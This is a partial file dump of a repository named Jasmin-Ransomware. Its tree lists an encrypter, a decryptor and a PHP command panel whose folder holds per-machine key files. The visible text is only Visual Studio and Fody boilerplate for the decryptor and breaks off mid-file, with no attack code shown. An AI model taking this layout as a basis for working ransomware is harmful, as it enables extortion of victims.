├── Images ├── jasmin-banner.gif ├── logo.jpg ├── ngrok.PNG ├── variable.gif ├── workflow.png └── xampp.jpg ├── Jasmin Decryptor ├── .vs │ └── Jasmin Decryptor │ │ └── v16 │ │ ├── .suo │ │ └── Server │ │ └── sqlite3 │ │ ├── db.lock │ │ └── storage.ide ├── FodyWeavers.xml ├── FodyWeavers.xsd ├── Hopstarter-Soft-Scraps-Lock-Unlock (1).ico ├── Jasmin Decryptor.csproj ├── Jasmin Decryptor.csproj.user ├── Jasmin Decryptor.sln ├── Program.cs ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings ├── Resources │ ├── buttuon3.png │ ├── buttuon4.png │ ├── close button.png │ ├── flora BLACK.png │ ├── fotter.PNG │ ├── header3.PNG │ ├── icon.gif │ ├── invaild key.png │ ├── line.png │ ├── line1.png │ ├── loading.gif │ ├── minimize.png │ ├── not found.png │ ├── report.png │ ├── verified.jpg │ └── wait cat 2.gif ├── app.config ├── bin │ └── Release │ │ ├── Jasmin Decryptor.exe │ │ ├── Jasmin Decryptor.exe.config │ │ └── Jasmin Decryptor.pdb ├── mainform.Designer.cs ├── mainform.cs ├── mainform.resx ├── obj │ └── Release │ │ ├── Costura │ │ └── 5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed │ │ ├── Jasmin Decryptor.csproj.FileListAbsolute.txt │ │ ├── Jasmin Decryptor.csproj.Fody.CopyLocal.cache │ │ ├── Jasmin Decryptor.csproj.GenerateResource.cache │ │ ├── Jasmin Decryptor.exe │ │ ├── Jasmin Decryptor.pdb │ │ ├── Jasmin_Decryptor.Properties.Resources.resources │ │ └── Jasmin_Decryptor.mainform.resources ├── packages.config └── packages │ ├── Costura.Fody.4.1.0 │ ├── .signature.p7s │ ├── Costura.Fody.4.1.0.nupkg │ ├── build │ │ └── Costura.Fody.props │ ├── lib │ │ └── net40 │ │ │ ├── Costura.dll │ │ │ └── Costura.xml │ └── weaver │ │ ├── Costura.Fody.dll │ │ └── Costura.Fody.xcf │ └── Fody.6.0.0 │ ├── .signature.p7s │ ├── Fody.6.0.0.nupkg │ ├── build │ └── Fody.targets │ ├── netclassictask │ ├── Fody.dll │ ├── FodyCommon.dll │ ├── FodyHelpers.dll │ ├── FodyIsolated.dll │ ├── Mono.Cecil.Pdb.dll │ ├── Mono.Cecil.Pdb.pdb │ ├── Mono.Cecil.Rocks.dll │ ├── Mono.Cecil.Rocks.pdb │ ├── Mono.Cecil.dll │ └── Mono.Cecil.pdb │ └── netstandardtask │ ├── Fody.dll │ ├── FodyCommon.dll │ ├── FodyHelpers.dll │ ├── FodyIsolated.dll │ ├── Mono.Cecil.Pdb.dll │ ├── Mono.Cecil.Pdb.pdb │ ├── Mono.Cecil.Rocks.dll │ ├── Mono.Cecil.Rocks.pdb │ ├── Mono.Cecil.dll │ └── Mono.Cecil.pdb ├── Jasmin Encrypter ├── .vs │ └── Jasmin Encryptor │ │ └── v16 │ │ ├── .suo │ │ └── Server │ │ └── sqlite3 │ │ ├── db.lock │ │ └── storage.ide ├── App.config ├── FodyWeavers.xml ├── FodyWeavers.xsd ├── Hopstarter-Soft-Scraps-Lock-Lock.ico ├── Jasmin Encryptor.csproj ├── Jasmin Encryptor.csproj.user ├── Jasmin Encryptor.sln ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── obj │ └── Release │ │ ├── Costura │ │ ├── 0165A7E6E6D214D5FB18A09E91E5106FCAA97A8A.costura.ipinfo.dll.compressed │ │ ├── 1248142EB45EED3BEB0D9A2D3B8BED5FE2569B10.costura.newtonsoft.json.dll.compressed │ │ ├── 5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed │ │ └── 70F41BF2BAA694D4393D87B721486B8783B65ADE.costura.sharpcompress.dll.compressed │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ └── Jasmin Encryptor.csproj.FileListAbsolute.txt ├── packages.config └── packages │ ├── Costura.Fody.4.1.0 │ ├── .signature.p7s │ ├── Costura.Fody.4.1.0.nupkg │ ├── build │ │ └── Costura.Fody.props │ ├── lib │ │ └── net40 │ │ │ ├── Costura.dll │ │ │ └── Costura.xml │ └── weaver │ │ ├── Costura.Fody.dll │ │ └── Costura.Fody.xcf │ ├── Fody.6.0.0 │ ├── .signature.p7s │ ├── Fody.6.0.0.nupkg │ ├── build │ │ └── Fody.targets │ ├── netclassictask │ │ ├── Fody.dll │ │ ├── FodyCommon.dll │ │ ├── FodyHelpers.dll │ │ ├── FodyIsolated.dll │ │ ├── Mono.Cecil.Pdb.dll │ │ ├── Mono.Cecil.Pdb.pdb │ │ ├── Mono.Cecil.Rocks.dll │ │ ├── Mono.Cecil.Rocks.pdb │ │ ├── Mono.Cecil.dll │ │ └── Mono.Cecil.pdb │ └── netstandardtask │ │ ├── Fody.dll │ │ ├── FodyCommon.dll │ │ ├── FodyHelpers.dll │ │ ├── FodyIsolated.dll │ │ ├── Mono.Cecil.Pdb.dll │ │ ├── Mono.Cecil.Pdb.pdb │ │ ├── Mono.Cecil.Rocks.dll │ │ ├── Mono.Cecil.Rocks.pdb │ │ ├── Mono.Cecil.dll │ │ └── Mono.Cecil.pdb │ ├── IpInfo.1.0.5.1 │ ├── .signature.p7s │ ├── IpInfo.1.0.5.1.nupkg │ ├── lib │ │ ├── net45 │ │ │ ├── IpInfo.dll │ │ │ └── IpInfo.xml │ │ └── netstandard2.0 │ │ │ ├── IpInfo.dll │ │ │ └── IpInfo.xml │ └── nuget_icon.png │ ├── Newtonsoft.Json.12.0.3 │ ├── .signature.p7s │ ├── LICENSE.md │ ├── Newtonsoft.Json.12.0.3.nupkg │ ├── lib │ │ ├── net20 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ ├── net35 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ ├── net40 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ ├── net45 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ ├── netstandard1.0 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ ├── netstandard1.3 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ ├── netstandard2.0 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ ├── portable-net40+sl5+win8+wp8+wpa81 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ │ └── portable-net45+win8+wp8+wpa81 │ │ │ ├── Newtonsoft.Json.dll │ │ │ └── Newtonsoft.Json.xml │ └── packageIcon.png │ ├── SharpCompress.0.24.0 │ ├── .signature.p7s │ ├── SharpCompress.0.24.0.nupkg │ └── lib │ │ ├── net35 │ │ └── SharpCompress.dll │ │ ├── net45 │ │ └── SharpCompress.dll │ │ ├── netstandard1.0 │ │ └── SharpCompress.dll │ │ ├── netstandard1.3 │ │ └── SharpCompress.dll │ │ └── netstandard2.0 │ │ └── SharpCompress.dll │ └── System.Management.4.7.0 │ ├── .signature.p7s │ ├── LICENSE.TXT.neki │ ├── System.Management.4.7.0.nupkg │ ├── THIRD-PARTY-NOTICES.TXT.neki │ ├── lib │ ├── net45 │ │ └── _._ │ └── netstandard2.0 │ │ ├── System.Management.dll │ │ └── System.Management.xml │ ├── ref │ ├── net45 │ │ └── _._ │ └── netstandard2.0 │ │ ├── System.Management.dll │ │ └── System.Management.xml │ ├── runtimes │ └── win │ │ └── lib │ │ ├── net45 │ │ └── _._ │ │ └── netcoreapp2.0 │ │ ├── System.Management.dll │ │ └── System.Management.xml │ ├── useSharedDesignerContext.txt.neki │ └── version.txt.neki ├── README.md └── Web Panel ├── alertmsg.zip ├── assets ├── css │ ├── loading.css │ ├── notfound.css │ ├── style.css │ ├── style1.css │ └── style2.css ├── js │ └── login.js └── other │ ├── loading.php │ ├── notfound │ ├── notfound.php │ └── notfoundgg.html ├── checklogin.php ├── dashboard.php ├── database ├── db_conection.php ├── jasmin_db.sql └── readme.txt ├── download_file.php ├── handshake.php ├── index.php ├── kit.zip ├── login.php ├── logout.php ├── passwords ├── Bollywood_Salman Khan │ └── 03-26-10_df545f454f5d4f5d4af5.flora ├── DESKTOP-37Q74QH_cyberstair │ ├── 01-06-41_96457DF79A87C7C0008A7BE7.flora │ ├── 01-10-22_96457DF79A87C7C0008A7BE7.flora │ ├── 01-54-51_96457DF79A87C7C0008A7BE7.flora │ ├── 03-14-21_96457DF79A87C7C0008A7BE7.flora │ ├── 03-20-03_96457DF79A87C7C0008A7BE7.flora │ ├── 03-22-54_96457DF79A87C7C0008A7BE7.flora │ ├── 03-23-04_96457DF79A87C7C0008A7BE7.flora │ ├── 03-24-33_96457DF79A87C7C0008A7BE7.flora │ └── 03-25-10_96457DF79A87C7C0008A7BE7.flora ├── DESKTOP-G23OAQT_Cyberstair │ ├── 00-00-29_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-01-25_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-01-39_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-04-30_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-07-04_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-10-25_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-13-13_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-16-07_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-26-49_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 00-45-28_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 01-05-39_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 01-20-23_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 01-34-07_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 01-39-18_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 01-39-32_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 22-35-07_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 22-48-38_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-09-51_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-13-50_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-20-14_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-21-46_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-26-28_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-31-58_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-35-35_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ ├── 23-51-40_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora │ └── 23-59-12_CA0E649758DFAE938EE4E9C12AEB758DFAF17FD220F745750EFBEA2C.flora ├── FiFa_Leone Messi │ ├── 03-29-59_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-45-26_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-45-31_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-45-38_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-45-46_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-45-50_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-45-53_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-45-58_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-46-01_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-46-09_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-46-16_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-46-23_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-46-30_gfhsfkdjkfvdd454s5g4.flora │ ├── 07-46-36_gfhsfkdjkfvdd454s5g4.flora │ └── 07-46-47_gfhsfkdjkfvdd454s5g4.flora ├── Indian Cricket_Virat Kohli │ └── 03-27-03_SDGFs4F4S4FD4F4545fs.flora ├── Jarvis_tonny │ ├── 15-04-57_sagasgsfg4.flora │ ├── 23-47-15_sagasgsfg4.flora │ ├── 23-47-20_sagasgsfg4.flora │ ├── 23-47-25_sagasgsfg4.flora │ ├── 23-47-29_sagasgsfg4.flora │ ├── 23-47-33_sagasgsfg4.flora │ ├── 23-47-42_sagasgsfg4.flora │ ├── 23-47-46_sagasgsfg4.flora │ ├── 23-47-51_sagasgsfg4.flora │ ├── 23-47-57_sagasgsfg4.flora │ ├── 23-47-59_sagasgsfg4.flora │ ├── 23-48-14_sagasgsfg4.flora │ ├── 23-48-21_sagasgsfg4.flora │ ├── 23-48-28_sagasgsfg4.flora │ ├── 23-48-34_sagasgsfg4.flora │ ├── 23-48-41_sagasgsfg4.flora │ ├── 23-48-49_sagasgsfg4.flora │ ├── 23-48-56_sagasgsfg4.flora │ ├── 23-49-03_sagasgsfg4.flora │ ├── 23-49-09_sagasgsfg4.flora │ ├── 23-49-16_sagasgsfg4.flora │ ├── 23-49-24_sagasgsfg4.flora │ ├── 23-49-30_sagasgsfg4.flora │ ├── 23-49-37_sagasgsfg4.flora │ ├── 23-49-45_sagasgsfg4.flora │ ├── 23-51-28_sagasgsfg4.flora │ ├── 23-51-32_sagasgsfg4.flora │ ├── 23-51-34_sagasgsfg4.flora │ ├── 23-51-36_sagasgsfg4.flora │ ├── 23-51-37_sagasgsfg4.flora │ ├── 23-51-40_sagasgsfg4.flora │ ├── 23-51-42_sagasgsfg4.flora │ ├── 23-51-44_sagasgsfg4.flora │ ├── 23-51-46_sagasgsfg4.flora │ ├── 23-51-48_sagasgsfg4.flora │ ├── 23-51-50_sagasgsfg4.flora │ ├── 23-51-58_sagasgsfg4.flora │ ├── 23-52-00_sagasgsfg4.flora │ ├── 23-52-03_sagasgsfg4.flora │ ├── 23-52-07_sagasgsfg4.flora │ ├── 23-52-10_sagasgsfg4.flora │ ├── 23-52-19_sagasgsfg4.flora │ ├── 23-52-21_sagasgsfg4.flora │ ├── 23-52-24_sagasgsfg4.flora │ ├── 23-52-26_sagasgsfg4.flora │ ├── 23-52-28_sagasgsfg4.flora │ ├── 23-52-30_sagasgsfg4.flora │ ├── 23-52-32_sagasgsfg4.flora │ ├── 23-52-34_sagasgsfg4.flora │ ├── 23-52-52_sagasgsfg4.flora │ ├── 23-53-08_sagasgsfg4.flora │ ├── 23-53-10_sagasgsfg4.flora │ ├── 23-53-26_sagasgsfg4.flora │ ├── 23-53-30_sagasgsfg4.flora │ ├── 23-53-43_sagasgsfg4.flora │ ├── 23-53-49_sagasgsfg4.flora │ ├── 23-53-55_sagasgsfg4.flora │ ├── 23-53-57_sagasgsfg4.flora │ ├── 23-54-00_sagasgsfg4.flora │ ├── 23-54-02_sagasgsfg4.flora │ ├── 23-55-20_sagasgsfg4.flora │ └── 23-55-33_sagasgsfg4.flora └── White House_Donald Trump │ └── 03-28-32_fgighefesdgvrd5g45rd4h.flora ├── readme.txt └── search.php /Images/jasmin-banner.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Images/jasmin-banner.gif -------------------------------------------------------------------------------- /Images/logo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Images/logo.jpg -------------------------------------------------------------------------------- /Images/ngrok.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Images/ngrok.PNG -------------------------------------------------------------------------------- /Images/variable.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Images/variable.gif -------------------------------------------------------------------------------- /Images/workflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Images/workflow.png -------------------------------------------------------------------------------- /Images/xampp.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Images/xampp.jpg -------------------------------------------------------------------------------- /Jasmin Decryptor/.vs/Jasmin Decryptor/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/.vs/Jasmin Decryptor/v16/.suo -------------------------------------------------------------------------------- /Jasmin Decryptor/.vs/Jasmin Decryptor/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/.vs/Jasmin Decryptor/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Jasmin Decryptor/.vs/Jasmin Decryptor/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/.vs/Jasmin Decryptor/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Jasmin Decryptor/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /Jasmin Decryptor/FodyWeavers.xsd: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 13 | 14 | 15 | 16 | 17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 18 | 19 | 20 | 21 | 22 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 23 | 24 | 25 | 26 | 27 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 28 | 29 | 30 | 31 | 32 | The order of preloaded assemblies, delimited with line breaks. 33 | 34 | 35 | 36 | 37 | 38 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 39 | 40 | 41 | 42 | 43 | Controls if .pdbs for reference assemblies are also embedded. 44 | 45 | 46 | 47 | 48 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 49 | 50 | 51 | 52 | 53 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 54 | 55 | 56 | 57 | 58 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 59 | 60 | 61 | 62 | 63 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 64 | 65 | 66 | 67 | 68 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 69 | 70 | 71 | 72 | 73 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 74 | 75 | 76 | 77 | 78 | A list of unmanaged 32 bit assembly names to include, delimited with |. 79 | 80 | 81 | 82 | 83 | A list of unmanaged 64 bit assembly names to include, delimited with |. 84 | 85 | 86 | 87 | 88 | The order of preloaded assemblies, delimited with |. 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. 97 | 98 | 99 | 100 | 101 | A comma-separated list of error codes that can be safely ignored in assembly verification. 102 | 103 | 104 | 105 | 106 | 'false' to turn off automatic generation of the XML Schema file. 107 | 108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Hopstarter-Soft-Scraps-Lock-Unlock (1).ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Decryptor/Hopstarter-Soft-Scraps-Lock-Unlock (1).ico -------------------------------------------------------------------------------- /Jasmin Decryptor/Jasmin Decryptor.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | Debug 7 | AnyCPU 8 | {6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD} 9 | WinExe 10 | Jasmin_Decryptor 11 | Jasmin Decryptor 12 | v4.5 13 | 512 14 | true 15 | 16 | 17 | 18 | publish\ 19 | true 20 | Disk 21 | false 22 | Foreground 23 | 7 24 | Days 25 | false 26 | false 27 | true 28 | 0 29 | 1.0.0.%2a 30 | false 31 | false 32 | true 33 | 34 | 35 | AnyCPU 36 | true 37 | full 38 | false 39 | bin\Debug\ 40 | DEBUG;TRACE 41 | prompt 42 | 4 43 | false 44 | 45 | 46 | AnyCPU 47 | pdbonly 48 | true 49 | bin\Release\ 50 | TRACE 51 | prompt 52 | 4 53 | false 54 | 55 | 56 | Hopstarter-Soft-Scraps-Lock-Unlock %281%29.ico 57 | 58 | 59 | 60 | packages\Costura.Fody.4.1.0\lib\net40\Costura.dll 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | Form 77 | 78 | 79 | mainform.cs 80 | 81 | 82 | 83 | 84 | mainform.cs 85 | 86 | 87 | ResXFileCodeGenerator 88 | Resources.Designer.cs 89 | Designer 90 | 91 | 92 | True 93 | Resources.resx 94 | True 95 | 96 | 97 | 98 | 99 | SettingsSingleFileGenerator 100 | Settings.Designer.cs 101 | 102 | 103 | True 104 | Settings.settings 105 | True 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | False 159 | .NET Framework 3.5 SP1 160 | false 161 | 162 | 163 | 164 | 165 | 166 | 167 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 168 | 169 | 170 | 171 | 172 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Jasmin Decryptor.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | en-US 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Jasmin Decryptor.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29613.14 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Jasmin Decryptor", "Jasmin Decryptor.csproj", "{6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {E97E1A7D-074A-4AF9-8B16-3E30360A0C4C} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Windows.Forms; 5 | 6 | namespace Jasmin_Decryptor 7 | { 8 | static class Program 9 | { 10 | /// 11 | /// The main entry point for the application. 12 | /// 13 | [STAThread] 14 | static void Main() 15 | { 16 | Application.EnableVisualStyles(); 17 | Application.SetCompatibleTextRenderingDefault(false); 18 | Application.Run(new mainform()); 19 | } 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Jasmin Decryptor")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Jasmin Decryptor")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("6ff9974c-b3c6-4eea-8472-22be6bd6f5cd")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Jasmin Decryptor/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Jasmin_Decryptor.Properties { 12 | using System; 13 | 14 | 15 | /// 16 | /// A strongly-typed resource class, for looking up localized strings, etc. 17 | /// 18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resources() { 33 | } 34 | 35 | /// 36 | /// Returns the cached ResourceManager instance used by this class. 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | internal static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Jasmin_Decryptor.Properties.Resources", typeof(Resources).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// Overrides the current thread's CurrentUICulture property for all 51 | /// resource lookups using this strongly typed resource class. 52 | /// 53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | internal static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | 63 | /// 64 | /// Looks up a localized resource of type System.Drawing.Bitmap. 65 | /// 66 | internal static System.Drawing.Bitmap buttuon3 { 67 | get { 68 | object obj = ResourceManager.GetObject("buttuon3", resourceCulture); 69 | return ((System.Drawing.Bitmap)(obj)); 70 | } 71 | } 72 | 73 | /// 74 | /// Looks up a localized resource of type System.Drawing.Bitmap. 75 | /// 76 | internal static System.Drawing.Bitmap buttuon4 { 77 | get { 78 | object obj = 